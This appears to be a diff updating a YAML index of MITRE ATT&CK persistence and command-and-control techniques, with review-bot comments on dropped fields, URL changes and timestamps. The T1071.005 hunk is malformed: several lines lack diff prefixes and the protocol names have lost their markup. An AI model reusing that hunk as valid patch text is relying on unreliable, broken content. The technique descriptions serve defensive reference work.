- external_id: T1505.001
- url: https://attack.mitre.org/techniques/T1505/001
- - source_name: NetSPI Startup Stored Procedures
- url: https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/
- description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
- SQL Server – Part 1: Startup Stored Procedures. Retrieved July 8, 2019.'
- - source_name: Kaspersky MSSQL Aug 2019
- url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
- description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
- attack on Microsoft SQL Server. Retrieved September 4, 2019.'
- - source_name: Microsoft xp_cmdshell 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
- description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
- September 9, 2019.
- - source_name: Microsoft CLR Integration 2017
- url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
- description: Microsoft. (2017, June 19). Common Language Runtime Integration.
- Retrieved July 8, 2019.
- - source_name: NetSPI SQL Server CLR
- url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
- description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
- Retrieved July 8, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-15T16:05:24.007Z'
name: SQL Stored Procedures
description: "Adversaries may abuse SQL stored procedures to establish persistent
access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -36145,20 +36540,57 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Carlos Borges, @huntingneo, CIP
+ - Lucas da Silva Pereira, @vulcanunsec, CIP
+ - Kaspersky
+ x_mitre_deprecated: false
x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
NetSPI Startup Stored Procedures) Consider enabling audit features that can
log malicious startup activities.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+ created: '2019-12-12T14:59:58.168Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/001
+ external_id: T1505.001
+ - source_name: Microsoft CLR Integration 2017
+ description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+ Retrieved July 8, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+ - source_name: Microsoft xp_cmdshell 2017
+ description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+ September 9, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+ - source_name: Kaspersky MSSQL Aug 2019
+ description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+ attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+ url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+ - source_name: NetSPI Startup Stored Procedures
+ description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+ SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+ 2024.'
+ url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - source_name: NetSPI SQL Server CLR
+ description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+ Retrieved September 12, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.004:
technique:
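Review bot: The T1505.001 rewrite drops `x_mitre_permissions_required` (Administrator, SYSTEM, root) without a replacement, so the index loses the one field that told a reader this persistence requires sysadmin-level rights on the SQL Server; confirm the field is intentionally retired upstream rather than lost in the reorder, and if it is, note the loss in the version bump to 1.1. The two NetSPI references are handled well: both URLs move from `blog.netspi.com` to `www.netspi.com` and both `Retrieved` dates are bumped to September 12, 2024 in step.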
@@ -36188,7 +36620,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36212,12 +36644,10 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
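Review bot: T1556.004 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` in this hunk with nothing added in their place, unlike T1556 and T1078.003 where a `x_mitre_attack_spec_version` value is retained or raised to 3.2.0; T1574.012 gets the same two-line deletion in the `@@ -36446` hunk below. If the attack spec version now lives elsewhere in those objects, fine, but if it is simply gone, consumers reading it for compatibility checks will see an unversioned object.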
@@ -36301,11 +36731,10 @@ persistence:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36357,9 +36786,8 @@ persistence:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -36408,7 +36836,7 @@ persistence:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36446,14 +36874,12 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
command-and-control:
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -36516,7 +36942,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.001:
technique:
@@ -36574,97 +36999,95 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1132.001
atomic_tests: []
T1568.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T15:55:16.111Z'
+ name: Domain Generation Algorithms
+ description: |-
+ Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+ DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+ Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
x_mitre_contributors:
- Ryan Benson, Exabeam
- Barry Shteiman, Exabeam
- Sylvain Gil, Exabeam
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
type: attack-pattern
+ id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
created: '2020-03-10T17:44:59.787Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1568.002
url: https://attack.mitre.org/techniques/T1568/002
- - source_name: Cybereason Dissecting DGAs
- url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
- description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
- Eight Real World DGA Variants. Retrieved February 18, 2019.'
- - source_name: Cisco Umbrella DGA
- url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
- description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
- Why so effective?. Retrieved February 18, 2019.
- - source_name: Unit 42 DGA Feb 2019
- url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
- description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
- Generation Algorithms (DGA). Retrieved February 19, 2019.'
- - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ external_id: T1568.002
+ - source_name: Elastic Predicting DGA
+ description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+ 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+ Networks. Retrieved April 26, 2019.
+ url: https://arxiv.org/pdf/1611.00791.pdf
+ - source_name: Talos CCleanup 2017
description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
Number of Machines at Risk. Retrieved March 9, 2018.'
- source_name: Talos CCleanup 2017
- - source_name: Akamai DGA Mitigation
- url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
- description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
- Domain Generation Algorithms. Retrieved February 18, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+ url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ - source_name: Pace University Detecting DGA May 2017
+ description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+ Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+ April 26, 2019.
+ url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+ - source_name: FireEye POSHSPY April 2017
description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
- source_name: FireEye POSHSPY April 2017
+ url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
- source_name: ESET Sednit 2017 Activity
- url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
the Year. Retrieved February 18, 2019.'
+ url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
- source_name: Data Driven Security DGA
- url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- - source_name: Pace University Detecting DGA May 2017
- url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
- description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
- Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
- April 26, 2019.
- - source_name: Elastic Predicting DGA
- url: https://arxiv.org/pdf/1611.00791.pdf
- description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
- 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
- Networks. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
- name: Domain Generation Algorithms
- description: |-
- Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
- DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
- Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- x_mitre_detection: |-
- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+ - source_name: Akamai DGA Mitigation
+ description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+ Domain Generation Algorithms. Retrieved February 18, 2019.
+ url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+ - source_name: Cisco Umbrella DGA
+ description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+ Why so effective?. Retrieved February 18, 2019.
+ url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+ - source_name: Cybereason Dissecting DGAs
+ description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+ Eight Real World DGA Variants. Retrieved February 18, 2019.'
+ url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+ - source_name: Unit 42 DGA Feb 2019
+ description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+ Generation Algorithms (DGA). Retrieved February 19, 2019.'
+ url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.004:
technique:
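Review bot: In the T1568.002 reference list the "Akamai DGA Mitigation" entry changes its URL from `blogs.akamai.com` to a personal `medium.com/@yvyuz` post while keeping `Retrieved February 18, 2019`; elsewhere in this patch a URL change is paired with a refreshed retrieval date (the NetSPI entries), so either update the date here or keep the original URL with an archive link. The hunk also drops `x_mitre_permissions_required: User` with no replacement, same concern as for T1505.001 above.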
@@ -36730,9 +37153,67 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.004
atomic_tests: []
+ T1071.005:
+ technique:
+ modified: '2024-10-16T13:08:35.629Z'
+ name: Publish/Subscribe Protocols
+ description: "Adversaries may communicate using publish/subscribe (pub/sub)
+ application layer protocols to avoid detection/network filtering by blending
+ in with existing traffic. Commands to the remote system, and often the results
+ of those commands, will be embedded within the protocol traffic between the
+ client and server. \n\nProtocols such as MQTT
, XMPP
,
+ AMQP
, and STOMP
use a publish/subscribe design,
+ with message distribution managed by a centralized broker.(Citation: wailing
+ crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+ messages by topics, while subscribers receive messages according to their
+ subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+ publish/subscribe protocols to communicate with systems under their control
+ from behind a message broker while also mimicking normal, expected traffic."
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ x_mitre_contributors:
+ - Domenico Mazzaferro Palmeri
+ - Sofia Sanchez Margolles
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Network Traffic: Network Traffic Content'
+ type: attack-pattern
+ id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+ created: '2024-08-28T14:14:18.512Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1071/005
+ external_id: T1071.005
+ - source_name: wailing crab sub/pub
+ description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+ 21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+ August 28, 2024.
+ url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+ - source_name: Mandiant APT1 Appendix
+ description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+ Retrieved July 18, 2016.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1573.001:
technique:
modified: '2023-12-26T20:58:19.356Z'
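Review bot: the new T1071.005 description is broken in the hunk as shown: the lines reading `, XMPP`, `,`, `, and STOMP` and `use a publish/subscribe design,` carry no `+` prefix, so the patch will not apply cleanly, and the protocol names `MQTT`, `XMPP`, `AMQP` and `STOMP` appear to have lost whatever markup surrounded them, which suggests the description was not emitted as a single quoted scalar. Regenerate this entry from the ATT&CK STIX source and confirm the description round-trips through the YAML dumper before merging. Also worth confirming that `x_mitre_detection: ''` is what upstream ships for this sub-technique and not a dump default, since the sibling entries in this file carry non-empty detection text.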
@@ -36778,7 +37259,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1568.001:
technique:
@@ -36810,7 +37290,7 @@ command-and-control:
url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
are they and how do they work?. Retrieved March 11, 2020.'
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T16:10:37.183Z'
name: Fast Flux DNS
description: |-
Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
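Review bot: the `modified` timestamp for T1568.001 moves backwards here, from `2021-04-29T14:49:39.188Z` to `2020-03-27T16:10:37.183Z`, and the same regression recurs in later hunks for T1205, T1572, T1090, T1568, T1568.003, T1104, T1205.001, T1102.003, T1102.002 and T1132.002, each time replacing a shared `2021-04-29T14:49:39.188Z` or `*T14:00:00.188Z` value. That shared value looks like a bulk stamp from an earlier import, so the new dates are probably the true upstream ones, but say so in the commit message and check that nothing downstream treats a decreasing `modified` as a stale or reverted object.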
@@ -36832,22 +37312,20 @@ command-and-control:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071:
technique:
- modified: '2024-01-17T22:52:23.454Z'
+ modified: '2024-08-28T14:10:33.145Z'
name: Application Layer Protocol
description: "Adversaries may communicate using OSI application layer protocols
to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will
be embedded within the protocol traffic between the client and server. \n\nAdversaries
may utilize many different protocols, including those used for web browsing,
- transferring files, electronic mail, or DNS. For connections that occur internally
- within an enclave (such as those between a proxy or pivot node and other nodes),
- commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
- Spy Email Nov 22) "
+ transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+ that occur internally within an enclave (such as those between a proxy or
+ pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+ Mandiant APT29 Eye Spy Email Nov 22) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
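Review bot: this hunk drops both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1568.001 with no replacement visible, whereas T1102 and T1001.003 later in the diff re-emit the attack spec version as `3.2.0` in their reordered objects. The same removal-without-replacement appears for T1572, T1090, T1568, T1568.003, T1104, T1205.001, T1102.003 and T1102.002. Either the key now sits earlier in those objects, outside the hunk, or it has been lost; please confirm, since every other entry in this file carries `x_mitre_attack_spec_version`. Removing `spec_version` everywhere is consistent across the diff and fine as long as the loader does not require it. The added `publishing/subscribing` wording in the T1071 description lines up with the new T1071.005 sub-technique.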
@@ -36869,7 +37347,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -36894,7 +37372,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071
atomic_tests: []
T1219:
@@ -36978,7 +37455,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1219
atomic_tests: []
T1659:
@@ -37042,11 +37518,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -37130,7 +37605,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1572:
technique:
@@ -37161,7 +37635,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T17:15:35.372Z'
name: Protocol Tunneling
description: "Adversaries may tunnel network communications to and from a victim
system within a separate protocol to avoid detection/network filtering and/or
@@ -37181,8 +37655,8 @@ command-and-control:
encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
